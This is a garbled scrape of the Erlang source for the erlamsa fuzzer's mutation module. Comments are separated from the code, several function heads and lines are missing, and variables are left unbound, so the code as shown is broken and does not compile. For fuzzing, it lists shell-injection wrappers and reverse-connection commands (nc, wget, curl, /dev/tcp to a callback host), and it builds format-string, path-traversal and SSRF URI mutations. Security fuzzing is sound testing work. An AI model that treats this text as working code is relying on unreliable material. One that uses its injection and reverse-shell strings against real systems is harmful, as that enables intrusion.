mutators_mutator([], Out) ->
    mux_fuzzers(Out);
mutators_mutator([{_, Pri, F, Name}|T], Out) ->
    N = erlamsa_rnd:rand(trunc(?MAX_SCORE)),
    mutators_mutator(T, [{max(2, N), Pri, F, Name} | Out]).
| null | https://raw.githubusercontent.com/Darkkey/erlamsa/16c74f32743a3153e330a62945f9880e53549ab1/src/erlamsa_mutations.erl | erlang |
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR
THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-------------------------------------------------------------------
@author dark_k3y
@doc
Mutations definitions.
@end
-------------------------------------------------------------------
API
return maximum possible score value
clone a byte vector and edit at given position
Number Mutator
TODO: verify that this is useful
low priority negative, because could be textual with less frequent numbers
drop byte
repeat a byte
flip a bit in a byte
insert a byte
-spec construct_sed_bytes_muta(byte_edit_fun(), atom()) -> mutation_fun().
should use something like repeat-len
permute a few bytes
repeat a seq
drop a seq
randomly applies maskfunction byte-per-byte to list with pre-randomized prob.
permute a few bytes
Lines
Lst -> bvec
TODO: ugly code, need a bit refactor
calc length only once
state is (n <line> ...)
Shared sequences
(a b ...) -> (a+a b ...)
next or current
a -> o
o -> a
Text mutations
check that the nodes do look stringy enough to mutate with these
heuristics, meaning there are some nodes and/or just one, but it's
stringy
insert badness
empty list -- just insert random
replace badness
empty list -- just replace with random
insert as
empty list -- just insert random
insert path traversal
empty list -- just insert random
insert null
empty list -- just insert random
TODO: check before or after E
empty list -- just insert random
Else, if Cs contains only byte nodes, it will run infinetely
Here, we do maximum L/4 runs in this case
TODO: WARN: Ineffective, need rewrite/optimize
[Node]
do something bad...
drop right
drop left
drop both
drop none
Play with delimeters
insert or drop special delimeter(s)
[Node]
do nothing
Base64 Mutator
io:format("~p ~n", [Cs]),
io:format("~p~n", [Ms]),
URI SSRF/Path traversal Mutator
need this wrapper in case if ets process not started (erlamsa_app:start haven't called)
replace file with http
Guessed Parse-tree Mutations
?? could be settable from command line
()
[]
<>
{}
""
''
out of data, didn't find close. return partial parse.
match complete, return with rest of list
we didn't run out of data and this is a single tree node
we ran out of data. this is a list of partial parses (having the data of
lst after hd in some form) which we want to preserve as tail
-spec count_nodes(list()) -> non_neg_integer().
%% count how many list nodes are in a tree structure
count_nodes(Lst) -> count_nodes(Lst, 0).
-spec count_nodes(list(), non_neg_integer()) -> non_neg_integer().
count_nodes([], N) -> N;
count_nodes([H|T], N) when is_list(H) ->
count_nodes([_|T], N) ->
count_nodes(T, N).
TODO: type for fun().
replace the node (sub . tail) with (op (sub . tail))
TODO: type for fun().
-spec flatten(list(), list()) -> list().
flatten([], Tl) ->
Tl;
flatten([H|T], Tl) ->
flatten(H, flatten(T, Tl));
flatten(Node, Tl) ->
[Node | Tl].
TODO: type for fun().
choose partially parsed node to mutate ;; fixme: not checked for F
TODO: type for fun().
tree stutter
preventing too deep lists
no child nodes
(byte|node ...)
TODO: VERY INEFFECTIVE, should be constant...
the canonical utf8 bom
utf16 be bom
ascii null be
ascii null le
and some others from wikipedia
Null debug mutator -- passes data "as is" -- for testing
Length predict mutations -- trying to mutate len
TODO: correct spec
-spec mutate_length(binary()) -> {integer(), binary()}.
set len field = 0
expand blob field with random data
drop blob field
set len field = random bytes(..)
ZIP Path traversal
replace with empty
dup a list
permute a list
delete an element
delete an element
mutate an element
mutate boolean -- just NOT
mutate a list
mutate a string or list of integers
mutate a binary
mutate an integer
mutate a float
Main Mutation Functions
limit to [min-score .. max-score]
[{Score, Priority, _, _}, ...] -> [{Rand(S*P), {...}}, ...] -> sort -> [{...}, ...]
the user at command line. Activation probability is (score*priority)/SUM(total-scores).
TODO: decribe fun() type
TODO: if some mutation goes wrong, these could be infinite loop; redesign in future
TODO: strange behaviour
default mutations list
default mutations list + external mutas
convert mutas list to standalone format
JSON/XML inner mutations
randomize mutator scores
| Copyright ( c ) 2011 - 2014
Copyright ( c ) 2014 - 2019
in the Software without restriction , including without limitation the rights
copies of the Software , and to permit persons to whom the Software is
all copies or substantial portions of the Software .
THE SOFTWARE IS PROVIDED " AS IS " , WITHOUT WARRANTY OF ANY KIND , EXPRESS OR
DAMAGES OR OTHER LIABILITY , WHETHER IN AN ACTION OF CONTRACT , TORT OR
-module(erlamsa_mutations).
-author("dark_k3y").
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-compile([export_all]).
-endif.
-include("erlamsa.hrl").
-export([make_mutator/2, mutators_mutator/1, mutations/0, mutations/1, default/1, tostring/1,
get_max_score/0, inner_mutations/1, get_ssrf_uri/0, basic_type_mutation/2]).
-define(MIN_SCORE, 2.0).
-define(MAX_SCORE, 10.0).
-define(RAND_DELTA, 18446744073709551616).
-type byte_edit_fun() :: fun((byte()) -> binary()).
-type text_mutators() :: insert_badness | replace_badness | insert_aaas | insert_null | insert_delimeter.
-spec get_max_score() -> float().
%% Return the maximum possible mutator score (the ?MAX_SCORE constant).
get_max_score() ->
    ?MAX_SCORE.
-spec edit_byte_vector(binary(), non_neg_integer(), byte_edit_fun()) -> binary().
%% Rebuild BVec with Func applied to the byte at 0-based position Pos; the
%% edit function may return zero, one or several replacement bytes. An
%% empty vector is returned untouched.
edit_byte_vector(<<>> = Empty, _Pos, _Func) ->
    Empty;
edit_byte_vector(BVec, Pos, Func) ->
    <<Head:Pos/binary, Byte:8, Rest/binary>> = BVec,
    Replacement = Func(Byte),
    <<Head/binary, Replacement/binary, Rest/binary>>.
-spec interesting_numbers() -> list(integer()).
%% Boundary values around powers of two (2^k - 1, 2^k, 2^k + 1) for the
%% usual integer widths; ordered from the widest (2^128) down.
interesting_numbers() ->
    Shifts = [1, 7, 8, 15, 16, 31, 32, 63, 64, 127, 128],
    lists:append([[(1 bsl I) - 1, 1 bsl I, (1 bsl I) + 1]
                  || I <- lists:reverse(Shifts)]).
-spec sign(integer()) -> integer().
%% 1 for non-negative values, -1 for negatives.
sign(X) when X < 0 -> -1;
sign(_) -> 1.
-spec mutate_float(float()) -> float().
%% Mutate a float by one of seven randomly chosen strategies.
mutate_float(Num) -> mutate_float(Num, erlamsa_rnd:rand(7)).

-spec mutate_float(float(), 0..7) -> float().
mutate_float(Num, Choice) ->
    case Choice of
        0 -> -Num;          %% negate
        1 -> 0.0;           %% zero
        2 -> 1.0;           %% one
        3 -> 1.0e-323;      %% near the smallest subnormal double
        4 -> 1.0e308;       %% near the largest finite double
        %% 5..7: random magnitude on a log scale
        _ -> erlamsa_rnd:rand_float() * math:exp(100 * erlamsa_rnd:rand_float())
    end.
-spec mutate_num(integer()) -> integer().
%% Mutate an integer using one of 12 randomly chosen strategies.
mutate_num(Num) -> mutate_num(Num, erlamsa_rnd:rand(12)).

-spec mutate_num(integer(), 0..12) -> integer().
mutate_num(Num, 0) -> Num + 1;  %% off-by-one up
mutate_num(Num, 1) -> Num - 1;  %% off-by-one down
mutate_num(_, 2) -> 0;          %% replace with zero
mutate_num(_, 3) -> 1;          %% replace with one
%% 4..5: replace with a power-of-two boundary value
mutate_num(_, N) when N > 3 andalso N < 6 -> erlamsa_rnd:rand_elem(interesting_numbers());
mutate_num(Num, 7) -> Num + erlamsa_rnd:rand_elem(interesting_numbers());
mutate_num(Num, 8) -> Num - erlamsa_rnd:rand_elem(interesting_numbers());
mutate_num(Num, 9) -> Num - erlamsa_rnd:rand(erlang:abs(Num)*2) * sign(Num);
%% 6, 10 and 11 all fall through to this clause: shift by a
%% log-distributed random delta, biased 2:1 toward addition.
mutate_num(Num, _) ->
    N = erlamsa_rnd:rand_range(1, 129),
    L = erlamsa_rnd:rand_log(N),
    S = erlamsa_rnd:rand(3),
    case S of
        0 -> Num - L;
        _Else -> Num + L
    end.
-spec get_num(binary()) -> {integer() | false, binary()}.
%% Parse an optionally-negative decimal number from the head of a binary.
%% Returns {Value, Rest} on success, {false, Input} when the binary does
%% not begin with digits (or a leading minus followed by digits).
get_num(Bin) -> get_num(Bin, 0, 0, 1).

-spec get_num(binary(), integer(), non_neg_integer(), 1 | -1) -> {integer() | false, binary()}.
get_num(<<>>, _Acc, 0, _Sign) -> {false, <<>>};
get_num(<<>>, Acc, _Digits, Sign) -> {Sign * Acc, <<>>};
get_num(<<C:8, Rest/binary>>, Acc, Digits, Sign) when C >= $0, C =< $9 ->
    get_num(Rest, Acc * 10 + (C - $0), Digits + 1, Sign);
get_num(<<C:8, Rest/binary>>, Acc, 0, _Sign) when C =:= $- ->
    %% a minus is only honoured before any digit has been seen
    get_num(Rest, Acc, 0, -1);
get_num(Rest, _Acc, 0, _Sign) -> {false, Rest};
get_num(Rest, Acc, _Digits, Sign) -> {Sign * Acc, Rest}.
-spec copy_range(binary(), binary(), binary()) -> binary().
%% Copy bytes from the start of the first binary until it has shrunk to
%% exactly End (a tail of it), then splice Tail in place of End.
copy_range(End, End, Tail) -> Tail;
copy_range(<<B:8, Rest/binary>>, End, Tail) ->
    Copied = copy_range(Rest, End, Tail),
    <<B:8, Copied/binary>>.
-spec mutate_a_num(binary(), integer()) -> {integer(), binary()}.
%% Walk the binary counting embedded decimal numbers; on reaching the end,
%% pick one of the NFound numbers at random and, while unwinding, mutate
%% exactly that one, rebuilding the binary on the way back up.
%% Returns {RemainingIndex, RebuiltBinary}; the index is 0 when no number
%% was found at all (caller checks this).
mutate_a_num(<<>>, NFound) ->
    %% end of data: choose which of the counted numbers to mutate
    Which = erlamsa_rnd:rand(NFound),
    {Which, <<>>};
mutate_a_num(Lst = <<H:8, T/binary>>, NFound) ->
    {ValP, LstP} = get_num(Lst),
    if
        ValP =/= false ->
            %% a number starts here; recurse past it first
            {Which, Tail} = mutate_a_num(LstP, NFound + 1),
            case Which of
                0 ->
                    %% this is the chosen number: mutate it and splice in
                    NewNum = mutate_num(ValP),
                    BinNewNum = list_to_bitstring(integer_to_list(NewNum)),
                    {-1, erlamsa_utils:merge(BinNewNum, Tail)};
                _Else ->
                    %% not chosen: copy its original digits through
                    {Which - 1, copy_range(Lst, LstP, Tail)}
            end;
        true ->
            %% not a digit: copy the byte through unchanged
            {Which, Tail} = mutate_a_num(T, NFound),
            {Which, <<H:8, Tail/binary>>}
    end.
-spec sed_num(list_of_bins(), meta_list()) -> mutation_res().
%% Number mutator: mutate one embedded decimal number in the head block.
%% Priority delta: -1 when nothing was found or data looks binary,
%% +2 for textual data containing numbers.
sed_num([H|T], Meta) ->
    {N, Lst} = mutate_a_num(H, 0),
    IsBin = erlamsa_utils:binarish(Lst),
    FlushedLst = erlamsa_utils:flush_bvecs(Lst, T),
    if
        N =:= 0 ->
            %% no number was found in the block
            %% NOTE(review): R is unbound in this clause -- a binding such
            %% as R = erlamsa_rnd:rand(...) appears to have been lost from
            %% this source; the clause cannot compile as written. TODO:
            %% restore the missing binding.
            case R of
                0 -> {fun sed_num/2, FlushedLst, [{muta_num, 0}|Meta], -1};
                _Else -> {fun sed_num/2, FlushedLst, [{muta_num, 0}|Meta], 0}
            end;
        IsBin =:= true ->
            %% binary-looking data: deprioritize this mutator
            {fun sed_num/2, FlushedLst, [{muta_num, 1}|Meta], -1};
        true ->
            %% textual data with numbers: boost this mutator
            {fun sed_num/2, FlushedLst, [{muta_num, 1}|Meta], +2}
    end.
%% Single Byte-level Mutations
-spec construct_sed_byte_muta(byte_edit_fun(), atom()) -> mutation_fun().
%% Wrap a single-byte edit function F into a reusable mutator: it edits
%% one random byte of the head block and records Name in the metadata.
construct_sed_byte_muta(F, Name) ->
    fun Muta([Block | Rest], Meta) ->
            Pos = erlamsa_rnd:rand(byte_size(Block)),
            Delta = erlamsa_rnd:rand_delta(),
            {Muta, [edit_byte_vector(Block, Pos, F) | Rest],
             [{Name, Delta} | Meta], Delta}
    end.
-spec construct_sed_byte_drop() -> mutation_fun().
construct_sed_byte_muta(fun (B) -> <<B:0>> end, byte_drop).
-spec construct_sed_byte_inc() -> mutation_fun().
inc byte mod 256
construct_sed_byte_muta(fun (B) -> C = (B + 1) band 255, <<C:8>> end, byte_inc).
-spec construct_sed_byte_dec() -> mutation_fun().
dec byte mod 256
construct_sed_byte_muta(fun (B) -> C = (B - 1) band 255, <<C:8>> end, byte_dec).
-spec construct_sed_byte_repeat() -> mutation_fun().
construct_sed_byte_muta(fun (B) -> <<B:8, B:8>> end, byte_repeat).
-spec construct_sed_byte_flip() -> mutation_fun().
construct_sed_byte_muta(
fun (B) ->
Flip = erlamsa_rnd:rand(8),
Mask = 1 bsl Flip,
C = B bxor Mask,
<<C:8>>
end, byte_flip).
-spec construct_sed_byte_insert() -> mutation_fun().
construct_sed_byte_muta(
fun (B) ->
NewByte = erlamsa_rnd:rand(256),
<<NewByte:8, B:8>>
end, byte_insert).
-spec construct_sed_byte_random() -> mutation_fun().
swap a byte with a random one
construct_sed_byte_muta(
fun (_B) ->
NewByte = erlamsa_rnd:rand(256),
<<NewByte:8>>
end, byte_swap_random).
%% Multiple Byte-level Mutations
%% Warning: these implementations are not radamsa-like; they do "similar"
%% things, but in a different way and with slight differences.
-spec construct_sed_bytes_muta(fun(), atom()) -> mutation_fun().
construct_sed_bytes_muta(F, Name) ->
fun
Self([<<>>|BTail], Meta) ->
{Self, [<<>>|BTail], [{Name, -1}|Meta], -1};
Self([BVec|BTail], Meta) ->
BSize = byte_size(BVec),
S = erlamsa_rnd:rand(BSize),
L = erlamsa_rnd:rand_range(1, BSize - S + 1),
WARN : ^ here any ( min 2 ) , in radamsa 20 : magic constant ,
^^ check may be max(20 , ... ) with " MAGIX " could be MORE effective
H_bits = S*8,
P_bits = L*8,
<<H:H_bits, P:P_bits, T/binary>> = BVec,
C = F(<<H:H_bits>>, <<P:P_bits>>, T, BTail),
D = erlamsa_rnd:rand_delta(),
{Self, C, [{Name, BSize}|Meta], D}
end.
-spec construct_sed_bytes_perm() -> mutation_fun().
WARN : in radamsa max permutation block could not exceed length 20 , here could be any length
construct_sed_bytes_muta(
fun (H, Bs, T, BTail) ->
C = list_to_binary(
erlamsa_rnd:random_permutation(
binary_to_list(Bs))),
[<<H/binary, C/binary, T/binary>> | BTail]
end, seq_perm).
-spec construct_sed_bytes_repeat() -> mutation_fun().
construct_sed_bytes_muta(
fun (H, Bs, T, BTail) ->
max 2 ^ 10 = 1024 stuts
C = list_to_binary([Bs || _ <- lists:seq(1,N)]),
Res = [<<H/binary, C/binary ,T/binary>> | BTail],
Res
end, seq_repeat).
-spec construct_sed_bytes_drop() -> mutation_fun().
construct_sed_bytes_muta(
fun (H, _Bs, T, BTail) ->
[<<H/binary, T/binary>> | BTail] end, seq_drop).
-spec randmask(fun(), list()) -> list().
randmask(MaskFun, Ll) ->
MaskProb = erlamsa_rnd:erand(100),
randmask_loop(MaskFun, MaskProb, erlamsa_rnd:rand_occurs_fixed(MaskProb, 100), Ll, []).
-spec randmask_loop(fun(), non_neg_integer(), non_neg_integer(), list(), list()) -> list().
randmask_loop(_MaskFun, _MaskProb, _, [], Out) ->
lists:reverse(Out);
randmask_loop(MaskFun, MaskProb, true, [H | T], Out) ->
randmask_loop(MaskFun, MaskProb, erlamsa_rnd:rand_occurs_fixed(MaskProb, 100), T, [MaskFun(H) | Out]);
randmask_loop(MaskFun, MaskProb, false, [H | T], Out) ->
randmask_loop(MaskFun, MaskProb, erlamsa_rnd:rand_occurs_fixed(MaskProb, 100), T, [H | Out]).
-spec mask_nand(byte()) -> byte().
mask_nand(B) ->
B band (bnot (1 bsl erlamsa_rnd:rand(8))).
-spec mask_or(byte()) -> byte().
mask_or(B) ->
B bor (1 bsl erlamsa_rnd:rand(8)).
-spec mask_xor(byte()) -> byte().
mask_xor(B) ->
B bxor (1 bsl erlamsa_rnd:rand(8)).
-spec mask_replace(byte()) -> byte().
mask_replace(_) ->
erlamsa_rnd:rand(256).
-spec construct_sed_bytes_randmask(list(fun())) -> mutation_fun().
WARNING : in radamsa max permutation block could not exceed length 20 , here could be any length
MaskFun = erlamsa_rnd:rand_elem(MaskFunList),
construct_sed_bytes_muta(
fun (H, Bs, T, BTail) ->
C = list_to_binary(
randmask(MaskFun, binary_to_list(Bs))),
[<<H/binary, C/binary, T/binary>> | BTail]
end, seq_randmask).
-spec lines(binary()) -> [string()].
%% Split a binary into byte-list lines, cutting after each newline (10);
%% every line keeps its trailing newline, and a final fragment without
%% one is kept as-is.
lines(Bvec) -> lines(binary_to_list(Bvec), [], []).

lines([], [], Out) -> lists:reverse(Out);
lines([], Buff, Out) -> lists:reverse([lists:reverse(Buff) | Out]);
lines([10 | T], Buff, Out) -> lines(T, [], [lists:reverse([10 | Buff]) | Out]);
lines([C | T], Buff, Out) -> lines(T, [C | Buff], Out).
-spec unlines([string()]) -> binary().
%% Concatenate byte-list lines back into a single binary.
unlines(Lst) ->
    << <<(list_to_binary(Line))/binary>> || Line <- Lst >>.
-spec try_lines(binary()) -> [string()] | false.
%% #u8[byte ...] -> ((byte ... 10) ...) | false, if this doesn't look
%% like line-based text data
%% Split Bvec into lines, returning false when the split yields nothing
%% or the data looks binary (per erlamsa_utils:binarish/1); otherwise
%% the list of lines.
try_lines(Bvec) ->
    Ls = lines(Bvec),
    IsBin = erlamsa_utils:binarish(Bvec),
    if
        Ls =:= [] -> false;
        IsBin =:= true -> false;
        true -> Ls
    end.
-spec construct_line_muta(fun(), atom()) -> mutation_fun().
construct_line_muta(Op, Name) ->
fun Self(Ll = [H|T], Meta) ->
Ls = try_lines(H),
if
Ls =:= false ->
{Self, Ll, Meta, -1};
true ->
NH = unlines(MLs),
{Self, [NH | T], [{Name, 1}|Meta], 1}
end
end.
-spec construct_st_line_muta(fun(), atom(), list()) -> mutation_fun().
construct_st_line_muta(Op, Name, InitialState) ->
fun (Ll = [H|T], Meta) ->
Ls = try_lines(H),
if
Ls =:= false ->
{construct_st_line_muta(Op, Name, InitialState),
Ll, Meta, -1};
true ->
{Stp, NewLs} = Op(InitialState, Ls),
{construct_st_line_muta(Op, Name, Stp),
[unlines(NewLs) | T], [{Name, 1} | Meta], 1}
end
end.
-spec sed_fuse_this(list_of_bins(), meta_list()) -> mutation_res().
jump between two shared suffixes in the block
Lst = binary_to_list(H),
B = list_to_binary(erlamsa_fuse:fuse(Lst, Lst)),
D = erlamsa_rnd:rand_delta(),
{fun sed_fuse_this/2, [B | T], [{fuse_this, D}|Meta], D}.
-spec sed_fuse_next(list_of_bins(), meta_list()) -> mutation_res().
sed_fuse_next([H|T], Meta) ->
{Al1, Al2} = erlamsa_utils:halve(binary_to_list(H)),
Bl = binary_to_list(B),
Abl = erlamsa_fuse:fuse(Al1, Bl),
Abal = erlamsa_fuse:fuse(Abl, Al2),
D = erlamsa_rnd:rand_delta(),
{fun sed_fuse_next/2,
< - on avg 1x , max 2x block sizes
[{fuse_next, D}|Meta], D}.
-spec remember(binary()) -> mutation_fun().
remember(Block) ->
fun ([H|T], Meta) ->
TODO : Check -- in radamsa here using owllisp halve instead of split
{Al1, Al2} = erlamsa_utils:halve(binary_to_list(H)),
{Ol1, Ol2} = erlamsa_utils:halve(binary_to_list(Block)),
Swap = erlamsa_rnd:rand(3),
D = erlamsa_rnd:rand_delta(),
NewBlock = case Swap of
0 -> H;
_Else -> Block
end,
{remember(NewBlock),
< - on avg 1x , max 2x block sizes
erlamsa_utils:flush_bvecs(list_to_binary(B), T)),
[{fuse_old, D}|Meta], D}
end.
-spec sed_fuse_old(list_of_bins(), meta_list()) -> mutation_res().
sed_fuse_old(Ll = [H|_], Meta) ->
R = remember(H),
R(Ll, Meta).
%% ASCII string mutations (use UTF-8 later)
in radamsa this will stop if found byte node ; here , we continue
-spec stringy(list(byte())) -> false | true.
stringy([]) -> false;
stringy([{byte, _} | T]) -> false or stringy(T);
in radamsa -- length(Cs )
-spec silly_strings() -> list(string()).
added \r
["%n", "%n", "%s", "%d", "%p", "%#x", [0], "aaaa%d%n", [10], [13], [9], [8]].
-spec delimeters() -> list(string()).
delimeters() ->
["'", "\"", "'", "\"", "'", "\"", "&", ":", "|", ";",
"\\", [10], [13], [9], " ", "`", [0], "]", "[", ">", "<"].
-spec shellinjects() -> list(string()).
shellinjects() ->
[
"';~s;'", "\";~s;\"", ";~s;", "|~s#",
"^ ~s ^", "& ~s &", "&& ~s &&", "|| ~s ||",
"%0D~s%0D", "`~s`"
].
-spec revconnects() -> list(string()).
revconnects() ->
[
"calc.exe & notepad.exe ~s ~p ", "nc ~s ~p", "wget http://~s:~p", "curl ~s ~p",
"exec 3<>/dev/tcp/~s/~p", "sleep 100000 # ~s ~p ", "echo>/tmp/erlamsa.~s.~p"
].
-spec random_badness() -> list().
random_badness() ->
random_badness(erlamsa_rnd:rand(20) + 1, []).
-spec random_badness(non_neg_integer(), list()) -> list().
random_badness(0, Out) -> Out;
random_badness(N, Out) ->
X = erlamsa_rnd:rand_elem(silly_strings()),
random_badness(N - 1, X ++ Out).
-spec overwrite(list(), list()) -> list().
%% Lay New over the front of Old: the result starts with all of New and
%% continues with whatever of Old extends past New's length.
overwrite([], Old) ->
    Old;
overwrite([H | T], Old) ->
    Remaining = case Old of
                    [_ | OldTail] -> OldTail;
                    _ -> Old
                end,
    [H | overwrite(T, Remaining)].
-spec rand_as_count() -> non_neg_integer().
rand_as_count() ->
Type = erlamsa_rnd:rand(11),
case Type of
0 -> 127;
1 -> 128;
2 -> 255;
3 -> 256;
4 -> 16383;
5 -> 16384;
6 -> 32767;
7 -> 32768;
8 -> 65535;
9 -> 65536;
_Else -> erlamsa_rnd:rand(1024)
end.
-spec push_as(non_neg_integer(), list()) -> list().
%% Prepend N literal $a (97) characters onto Tail.
push_as(0, Tail) -> Tail;
push_as(N, Tail) -> push_as(N - 1, [$a | Tail]).
-spec insert_traversal(char()) -> list().
%% Build a path-traversal snippet: Symb followed by 1..10 random
%% repetitions of ".." ++ Symb (e.g. "/../../..").
insert_traversal(Symb) ->
    Depth = erlamsa_rnd:erand(10),
    Groups = lists:flatmap(fun (_) -> [$., $., Symb] end, lists:seq(1, Depth)),
    [Symb | Groups].
-spec mutate_text_data(string(), [text_mutators()]) -> string().
mutate_text_data(Lst, TxtMutators) ->
mutate_text(erlamsa_rnd:rand_elem(TxtMutators), Lst).
-spec buildrevconnect() -> string().
buildrevconnect() ->
Inj = erlamsa_rnd:rand_elem(shellinjects()),
Rev = erlamsa_rnd:rand_elem(revconnects()),
{IP, Port} = get_ssrf_ep(),
lists:flatten(io_lib:format(Inj, [io_lib:format(Rev, [IP, Port])])).
-spec mutate_text(text_mutators(), string()) -> string().
mutate_text(insert_badness, Lst) ->
in erlang lists starts from 1
Bad = random_badness(),
TODO : check before or after E , in radamsa Bad + + [ X ] ,
mutate_text(replace_badness, Lst) ->
in erlang lists starts from 1
Bad = random_badness(),
lists:sublist(Lst, P - 1) ++ overwrite(lists:nthtail(P, Lst), Bad);
mutate_text(insert_aaas, Lst) ->
N = rand_as_count(),
in erlang lists starts from 1
lists:sublist(Lst, P - 1) ++ push_as(N, lists:nthtail(P, Lst));
mutate_text(insert_traversal, Lst) ->
in erlang lists starts from 1
lists:sublist(Lst, P - 1)
++ insert_traversal(erlamsa_rnd:rand_elem(["\\", "/"]))
++ lists:nthtail(P, Lst);
mutate_text(insert_null, Lst) ->
Lst ++ [0];
insert
mutate_text(insert_delimeter, Lst) ->
in erlang lists starts from 1
Bad = erlamsa_rnd:rand_elem(delimeters()),
mutate_text(insert_shellinj, Lst) ->
in erlang lists starts from 1
ShellInj = buildrevconnect(),
erlamsa_utils:applynth(P, Lst, fun(E, R) -> ShellInj ++ [E|R] end).
Generic ASCII Bad mutation
In Radamsa , this function will work only if Cs started as string
-spec string_generic_mutate(chunk_list(), [text_mutators()], non_neg_integer(), non_neg_integer()) -> chunk_list().
string_generic_mutate(Cs, _, L, R) when R > L/4 -> Cs;
string_generic_mutate(Cs, TxtMutators, L, R) ->
in erlang , list is beginning from index 1
El = lists:nth(P, Cs),
case El of
{text, Bs} ->
Data = mutate_text_data(Bs, TxtMutators),
{byte, _Bs} ->
string_generic_mutate(Cs, TxtMutators, L, R + 1);
{delimited, Left, Bs, Right} ->
erlamsa_utils:applynth(P, Cs, fun (_E, Rest) -> [{delimited, Left, mutate_text_data(Bs, TxtMutators), Right}] ++ Rest end)
end.
-spec construct_ascii_mutator(fun(), atom()) -> mutation_fun().
construct_ascii_mutator(Fun, Name) ->
fun Ascii_mutator (Ll = [H|T], Meta) ->
Data = binary_to_list(H),
Cs = erlamsa_strlex:lex(Data),
in radamsa stringy_length
Ms = Fun(Cs),
D = erlamsa_rnd:rand_delta(),
BinData = list_to_binary(erlamsa_strlex:unlex(Ms)),
{Ascii_mutator,
[BinData | T],
[{Name, D}|Meta], D};
not a string at all ( even 1 node ) , skipping
{Ascii_mutator, Ll, Meta, -1}
end
end.
-spec construct_ascii_bad_mutator() -> mutation_fun().
construct_ascii_bad_mutator() ->
construct_ascii_mutator(
fun (Cs) -> string_generic_mutate(Cs,
[insert_badness, replace_badness, insert_traversal, insert_aaas, insert_null],
length(Cs), 0)
end,
ascii_bad).
-spec drop_delimeter(non_neg_integer(), chunk()) -> chunk().
drop one(both ) or zero delimeters
{text, [Left|Bs]};
{text, Bs ++ [Right]} ;
{text, Bs};
El.
-spec string_delimeter_mutate(chunk_list(), non_neg_integer(), non_neg_integer()) -> chunk_list().
string_delimeter_mutate(Cs, L, R) when R > L/4 -> Cs;
string_delimeter_mutate(Cs, L, R) ->
in erlang , list is beginning from index 1
El = lists:nth(P, Cs),
case El of
Data = mutate_text_data(Bs, [erlamsa_rnd:rand_elem(
[
insert_delimeter, insert_delimeter,
insert_delimeter, insert_shellinj
])
]),
string_delimeter_mutate(Cs, L, R + 1);
{delimited, _Left, _Bs, _Right} ->
Drop = drop_delimeter(erlamsa_rnd:rand(4), El),
erlamsa_utils:applynth(P, Cs, fun(_E, Rest) -> [Drop|Rest] end)
end.
-spec construct_ascii_delimeter_mutator() -> mutation_fun().
construct_ascii_delimeter_mutator() ->
construct_ascii_mutator(
fun (Cs) -> string_delimeter_mutate(Cs, length(Cs), 0)
end,
ascii_delimeter).
-spec base64_mutator(list_of_bins(), meta_list()) -> mutation_res().
base64_mutator([H|T], Meta) ->
Data = binary_to_list(H),
Cs = erlamsa_strlex:lex(Data),
MutasList = mutas_list(erlamsa_mutations:mutations([])),
{Ms, {NewD, NewMeta}} = lists:mapfoldl(
fun
({text, A}, Acc = {DAcc, MAcc}) when length(A) > 6 ->
try base64:decode(A) of
Bin ->
D = erlamsa_rnd:rand_delta(),
Muta = mutators_mutator(MutasList, []),
{_, NewLl, AddedMeta} = Muta([Bin], []),
NewBin = erlang:iolist_to_binary(NewLl),
{
{text, base64:encode_to_string(NewBin)},
{DAcc + D, [AddedMeta, {base64_mutator, D} | MAcc]}
}
catch
error:badarg ->
{{text, A}, Acc};
error:function_clause ->
{{text, A}, Acc};
_:_ ->
{{text, A}, Acc}
end;
(Lex, Acc) -> {Lex, Acc}
end,
{-1, Meta}, Cs),
BinData = list_to_binary(erlamsa_strlex:unlex(Ms)),
{fun base64_mutator/2, [BinData | T], NewMeta, NewD}.
-spec get_ssrf_ep() -> {string(), integer()}.
get_ssrf_ep() ->
try get_ssrf_ep_unsafe() of
{SSRFHost, SSRFPort} -> {SSRFHost, SSRFPort}
catch
_:_ -> {"localhost", 51234}
end.
-spec get_ssrf_ep_unsafe() -> {string(), integer()}.
get_ssrf_ep_unsafe() ->
SSRFPort = case ets:match(global_config, {cm_port, '$1'}) of
[[Port]] -> Port;
_ -> 51234
end,
SSRFSystemHost = case ets:match(global_config, {cm_host, '$1'}) of
[[SHost]] -> SHost;
_ -> {}
end,
SSRFUserHost = case ets:match(global_config, {cm_host_user, '$1'}) of
[[UHost]] -> UHost;
_ -> {}
end,
SSRFHost = case {SSRFSystemHost, SSRFUserHost} of
{{}, {}} -> "localhost";
{SSRFSystemHost, {}} -> inet:ntoa(SSRFSystemHost);
{_, SSRFUserHost} -> SSRFUserHost;
_ -> "localhost"
end,
{SSRFHost, SSRFPort}.
-spec get_ssrf_uri() -> list().
get_ssrf_uri() ->
{SSRFHost, SSRFPort} = get_ssrf_ep(),
io_lib:format("://~s:~p/", [SSRFHost, SSRFPort]).
-spec change_scheme(list()) -> list().
%% The argument is a REVERSED scheme accumulator: a reversed "file"
%% ("elif" prefix) is rewritten to "http"; anything else is simply
%% un-reversed.
change_scheme([$e, $l, $i, $f | Rest]) ->
    lists:reverse("ptth" ++ Rest);
change_scheme(Reversed) ->
    lists:reverse(Reversed).
-spec rand_uri_mutate(string(), string(), integer()) -> {string(), integer(), list()}.
rand_uri_mutate(T, Acc, 1) ->
{change_scheme(Acc) ++ get_ssrf_uri() ++ T, 1, {uri, success}};
rand_uri_mutate(T, Acc, 2) ->
{SSRFHost, SSRFPort} = get_ssrf_ep(),
AtAddr = lists:flatten(io_lib:format(erlamsa_rnd:rand_elem([" @~s:~p", "@~s:~p"]),
[SSRFHost, SSRFPort])
),
[Domain | Query] = string:tokens(T, "/"),
Modified = lists:flatten([change_scheme(Acc), "://", Domain, AtAddr, $/, string:join(Query,"/")]),
{Modified, 1, {uri, success}};
rand_uri_mutate(T, Acc, 3) ->
[Domain | Query] = string:tokens(T, "/"),
Traversals = ["/" | lists:map(fun (_) -> "../" end, lists:seq(1, erlamsa_rnd:erand(10)))],
